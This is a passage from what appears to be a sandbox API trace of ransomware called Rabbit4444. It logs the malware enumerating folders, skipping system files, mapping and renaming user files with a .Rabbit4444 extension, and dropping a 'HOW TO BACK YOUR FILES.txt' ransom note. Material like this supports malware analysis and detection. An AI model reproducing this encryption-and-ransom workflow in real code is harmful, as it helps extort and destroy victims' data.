param_1="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png.Rabbit4444") returned 67 [0046.464] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.465] InterlockedExchangeAdd (in: Addend=0xff618, Value=2176 | out: Addend=0xff618) returned 4912208 [0046.465] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2652 [0046.465] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea631830, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea631830, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x8a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NoNetworkConnectionHoverOver.png", cAlternateFileName="NONETW~2.PNG")) returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="Rabbit4444.exe") returned -1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2=".") returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="..") returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="windows") returned -1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="bootmgr") returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="pagefile.sys") returned -1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="boot") returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="ids.txt") returned 1 [0046.465] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="NTUSER.DAT") returned -1 [0046.465] lstrcpyW (in: lpString1=0x130eb7a, lpString2="NoNetworkConnectionHoverOver.png" | out: lpString1="NoNetworkConnectionHoverOver.png") returned="NoNetworkConnectionHoverOver.png" [0046.465] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png", dwFileAttributes=0x0) returned 1 [0046.466] lstrlenW (lpString="NoNetworkConnectionHoverOver.png") returned 32 [0046.466] lstrlenW (lpString="Rabbit4444") returned 10 [0046.466] lstrcmpiW (lpString1="erOver.png", lpString2="Rabbit4444") returned -1 [0046.466] lstrlenW (lpString=".dll") returned 4 [0046.466] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.466] lstrlenW (lpString=".lnk") returned 4 [0046.466] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.466] lstrlenW (lpString=".ini") returned 4 [0046.466] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.466] lstrlenW (lpString=".sys") returned 4 [0046.466] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.466] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.466] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.466] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13777687169) returned 1 [0046.466] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2212) returned 1 [0046.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0046.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0046.466] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbb0, lpName=0x0) returned 0x298 [0046.467] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbb0) returned 0x70000 [0046.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0046.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0046.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0046.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0046.469] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13777960038) returned 1 [0046.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0046.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0046.469] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.469] CloseHandle (hObject=0x298) returned 1 [0046.469] CloseHandle (hObject=0x278) returned 1 [0046.470] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png.Rabbit4444") returned 76 [0046.470] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.481] InterlockedExchangeAdd (in: Addend=0xff618, Value=2224 | out: Addend=0xff618) returned 4914384 [0046.481] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 2655 [0046.481] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea63c947, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pass.png", cAlternateFileName="")) returned 1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2="Rabbit4444.exe") returned -1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2=".") returned 1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2="..") returned 1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2="windows") returned -1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2="bootmgr") returned 1 [0046.481] lstrcmpiW (lpString1="pass.png", lpString2="pagefile.sys") returned 1 [0046.482] lstrcmpiW (lpString1="pass.png", lpString2="boot") returned 1 [0046.482] lstrcmpiW (lpString1="pass.png", lpString2="ids.txt") returned 1 [0046.482] lstrcmpiW (lpString1="pass.png", lpString2="NTUSER.DAT") returned 1 [0046.482] lstrcpyW (in: lpString1=0x130eb7a, lpString2="pass.png" | out: lpString1="pass.png") returned="pass.png" [0046.482] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png", dwFileAttributes=0x0) returned 1 [0046.482] lstrlenW (lpString="pass.png") returned 8 [0046.482] lstrlenW (lpString="Rabbit4444") returned 10 [0046.482] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0046.482] lstrlenW (lpString=".dll") returned 4 [0046.482] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.482] lstrlenW (lpString=".lnk") returned 4 [0046.482] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.482] lstrlenW (lpString=".ini") returned 4 [0046.482] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.482] lstrlenW (lpString=".sys") returned 4 [0046.483] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.483] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.483] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.483] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13779344120) returned 1 [0046.483] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1822) returned 1 [0046.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0046.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0046.483] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa20, lpName=0x0) returned 0x298 [0046.485] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa20) returned 0x70000 [0046.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0046.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0046.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0046.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0046.486] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13779693731) returned 1 [0046.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0046.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0046.486] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.486] CloseHandle (hObject=0x298) returned 1 [0046.486] CloseHandle (hObject=0x278) returned 1 [0046.488] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\pass.png.Rabbit4444") returned 52 [0046.488] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.488] InterlockedExchangeAdd (in: Addend=0xff618, Value=1824 | out: Addend=0xff618) returned 4916608 [0046.488] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2657 [0046.488] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea63c947, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pass.png", cAlternateFileName="")) returned 0 [0046.488] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0046.489] lstrcpyW (in: lpString1=0x130eb7a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.489] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0046.489] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0046.489] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0046.489] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.489] CloseHandle (hObject=0x278) returned 1 [0046.489] CloseHandle (hObject=0x27c) returned 1 [0046.490] GetCurrentThreadId () returned 0xd98 [0046.490] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0046.490] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS" [0046.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1448 | out: hHeap=0xe0000) returned 1 [0046.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0046.490] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS" [0046.490] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\" [0046.490] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3" [0046.490] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0046.491] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0046.495] FlushFileBuffers (hFile=0x27c) returned 1 [0046.496] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.496] CloseHandle (hObject=0x27c) returned 1 [0046.497] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS") returned 48 [0046.497] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.497] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5089731, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0046.497] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.497] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.497] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0046.497] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.497] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5089731, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.497] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.497] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.497] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0046.497] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.497] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.497] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5089731, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5089731, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5089731, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.497] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea6143a6, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0046.497] lstrcmpiW (lpString1="css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.497] lstrcmpiW (lpString1="css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.497] lstrcmpiW (lpString1="css", lpString2="Rabbit4444.exe") returned -1 [0046.497] lstrcmpiW (lpString1="css", lpString2=".") returned 1 [0046.498] lstrcmpiW (lpString1="css", lpString2="..") returned 1 [0046.498] lstrcmpiW (lpString1="css", lpString2="windows") returned -1 [0046.498] lstrcmpiW (lpString1="css", lpString2="bootmgr") returned 1 [0046.498] lstrcmpiW (lpString1="css", lpString2="pagefile.sys") returned -1 [0046.498] lstrcmpiW (lpString1="css", lpString2="boot") returned 1 [0046.498] lstrcmpiW (lpString1="css", lpString2="ids.txt") returned -1 [0046.498] lstrcmpiW (lpString1="css", lpString2="NTUSER.DAT") returned -1 [0046.498] lstrcpyW (in: lpString1=0x130eb9a, lpString2="css" | out: lpString1="css") returned="css" [0046.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0046.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x117680 [0046.498] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6350 [0046.498] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea61ff59, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2="Rabbit4444.exe") returned -1 [0046.498] lstrcmpiW (lpString1="js", lpString2=".") returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2="..") returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2="windows") returned -1 [0046.498] lstrcmpiW (lpString1="js", lpString2="bootmgr") returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2="pagefile.sys") returned -1 [0046.498] lstrcmpiW (lpString1="js", lpString2="boot") returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2="ids.txt") returned 1 [0046.498] lstrcmpiW (lpString1="js", lpString2="NTUSER.DAT") returned -1 [0046.498] lstrcpyW (in: lpString1=0x130eb9a, lpString2="js" | out: lpString1="js") returned="js" [0046.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6548 [0046.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x68) returned 0xf1448 [0046.499] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6550 | out: ListHead=0xf68b0, ListEntry=0xf6550) returned 0xf6530 [0046.499] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea61ff59, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0046.499] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0046.499] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.499] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0046.501] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0046.501] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0046.501] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.501] CloseHandle (hObject=0x278) returned 1 [0046.501] CloseHandle (hObject=0x27c) returned 1 [0046.502] GetCurrentThreadId () returned 0xd98 [0046.502] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6550 [0046.502] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js" [0046.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1448 | out: hHeap=0xe0000) returned 1 [0046.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6548 | out: hHeap=0xe0000) returned 1 [0046.502] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js" [0046.502] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\" [0046.502] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3" [0046.502] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0046.504] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0046.508] 